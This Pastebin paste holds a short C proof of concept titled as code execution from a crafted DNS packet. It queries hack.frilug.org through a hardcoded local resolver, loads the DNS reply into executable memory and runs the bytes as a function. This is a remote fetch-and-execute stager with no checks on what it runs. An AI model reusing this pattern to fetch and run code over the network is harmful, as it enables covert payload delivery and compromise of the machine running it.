Advertisement
bueddl

Code execution from special crafted dns packet

Feb 19th, 2015
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.96 KB | None | 0 0
  1. #include <stdio.h>
  2.  
  3. #include <sys/mman.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <netinet/in.h>
  7. #include <arpa/inet.h>
  8.  
  9. int main()
  10. {
  11.     struct sockaddr_in sr = {
  12.         .sin_family = AF_INET,
  13.         .sin_port   = htons(53),
  14.         .sin_addr.s_addr = 0x01b2a8c0
  15.     };
  16.     int sock = socket(AF_INET, SOCK_DGRAM, 0);
  17.     char *mem = mmap(0, 0x1000,
  18.                      PROT_READ | PROT_WRITE | PROT_EXEC,
  19.                      MAP_PRIVATE | MAP_ANONYMOUS,
  20.                      -1, 0);
  21.     sendto(sock,
  22.            "\x13\x37\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x04"
  23.            "hack\x06""frilug\x03""org\x00\x00\x01\x00\x01",
  24.            33, 0, (struct sockaddr *)&sr, sizeof(struct sockaddr_in));
  25.     recvfrom(sock, mem, 0x1000,
  26.              0, NULL, NULL);
  27.     int (*fun)(int, int) = (int (*)(int, int))&mem[0x2E];
  28.  
  29.     int a = 6;
  30.     int b = 7;
  31.     int ret = fun(a, b);
  32.     printf("fun(%d, %d) = %d\n", a, b, ret);
  33.     return 0;
  34. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement